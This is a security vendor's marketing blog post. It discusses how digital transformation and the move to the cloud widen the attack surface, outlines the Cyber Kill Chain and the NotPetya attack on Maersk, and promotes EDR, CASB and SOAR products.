The trend for digital systems replacing older technology is far from new. In the past, when newspapers moved from a traditional, labour intensive approach where typesetters had a job for life, to computer aided production, we probably would have termed it “replacing with new technology”. However, the rate at which the current wave of “digital transformation”, as we now term it, is sweeping through many industries is hugely significant, both in its effect on those companies involved and in the way it exposes them to threats and vulnerabilities in today’s Internet connected world.
Reports
now suggest that 65% of organisations are
checking and reporting on their compliance to
industry and security regulations and 15% of
CISOs (Chief Information Security Officers) and
CEOs now feel the need to allocate 10% of their
overall IT spend to SecOPs (Security
Operations).
Source: https://www.hackmageddon.com/category/security/cyber-attacks-statistics/
The threat is clear
Cyber Crime is often over 80% of the monthly statistics on all attacks, with cyber espionage typically at around 15%. Cyber warfare and hacktivism usually only accounts for 1-2%. There are now fairly common stories of cyber criminal gangs retiring from active hacking, having made $Billions from the pursuit: a sobering thought for any company with financial data open to extortion by ransomware, or IP (Intellectual Property) open to exfiltration and sale on the Dark Web. Source
Even PII (Personally Identifiable Information) or simple lists of user credentials (i.e. name and password) are all too attractive to the cyber-criminal and leaving them unguarded on the Internet, perhaps with associated PCI (Payment Card Industry) data, is tantamount to leaving your wallet visible in your car. Again, in the media industry, Netflix, who started as a DVD hire company but went through a digital transformation to become possibly the premier movie and TV streaming service, was hacked publicly by an email phishing attack. The hackers gained passwords simply to steal the paid service from their real owners but although the monetary value is low here, the loss of reputation is not to be ignored.
The cloud provides greater flexibility with greater exposure
As well as digital transformation, the
inexorable move to the cloud, which now sees
over 80% of enterprise network traffic going
off-premises, has exposed key company assets and
sensitive data to a much greater extent. The
idea of having a security perimeter, marshalled
by firewalls and traditional anti-virus
techniques is not really valid any longer and
the perimeter, or “attack surface” as it’s
described from the hacker’s perspective, is now
really global with cloud storage based wherever
cloud providers decide to locate it.
Not only is the area of cyber attack widening
but also the sophistication of the attacks is
increasing, with polymorphous malware avoiding
signature detection and crafted and staged
attacks using email or social media phishing to
gain user credentials. These details are
saved and then used at a later date by hackers.
This method enables cyber criminals to
infiltrate companies and use the admin rights
and privileges they already have to run
PowerShell/Mimikatz and then move laterally
inside their network, from endpoints to
supposedly secure hosts which contain the
company “crown jewels”.
The arms race
This evolution of the threat landscape exhibits a kind of “arms race” between hackers trying to get access and enterprises defending their assets and reputation. It really started back in the early days of Windows computing with host-based AV (Anti-Virus), through IDS/IDP (Intrusion Detection Systems/ Intrusion Detection Prevention) at the network perimeter, to a requirement for newer, more intelligent ways to defend against the kind of APTs (Advanced Persistent Threats) that are prevalent today.
Attack and countermeasures
Lockheed Martin, the US aerospace and defence
company, coined the term “kill chain”, a
military term used to describe the acquisition
and destruction of a target, for the stages of
attack and countermeasures with a cyber-attack.
This Cyber Kill Chain covers the 7 stages of
Reconnaissance (attacker selects the target and
identifies its vulnerabilities), Weaponization
(attacker builds a malware weapon, exploiting
the vulnerabilities), Delivery (attacker sends
malware to target), Exploitation (attacker’s
malware weapon triggers), Installation
(attacker’s malware weapon creates a “backdoor”
reusable access point), Command and Control
(attacker’s malware enables “hands on the
keyboard” access), Actions on Objective
(attacker achieves goals, such as data
exfiltration, data destruction, or encryption
for ransom).
Today’s APTs usually follow this kind of pattern. In 2017 Maersk, the container ship and supply vessel operator, were infamously hit by the NotPetya ransomware attack. They reportedly managed to contain the spread of this malicious software but they warned that it would cause them losses of up to $300 million and would require the overhaul and reinstallation of thousands of machines. Interestingly and perhaps ominously, the NotPetya virus is reportedly an adaptation and combination of two earlier pieces of malware: Petya, ransomware that encrypts a user’s hard drive which was used against Ukrainian banks, media and energy companies, and EternalBlue, a cyber attack developed by the US National Security Agency which uses a known vulnerability in Microsoft’s SMB (Server Message Block) protocol.
So what should your SecOps toolset look like?
In today’s hostile and digitally transformed
environment, advanced threat protection is
needed for both endpoint and cloud access and
this protection must be able to detect and
respond to attacks across all parts of the cyber
kill chain, with a coordinated SecOps (Security
Operations) approach providing incident and
event management and even automated response. At
activereach we have identified key partners with
advanced capabilities in the emerging cyber
security product areas of EDR (Endpoint
Detection and Response), CASB (Cloud Access
Security Broker) and SOAR (Security
Orchestration Automated Response).
Crowdstrike’s Falcon EDR platform brings machine learning and cloud delivery to provide complete endpoint protection via a single low resource, lightweight agent.
Netskope hold patents for CASB technology and have a unique capability to parse cloud traffic for API and JSON data, enabling full protection against advanced threats and data leakage.
Swimlane simplify the task of integrating multiple SecOps products by using an API-centric drag and drop playbook approach to provide leading SOAR capabilities.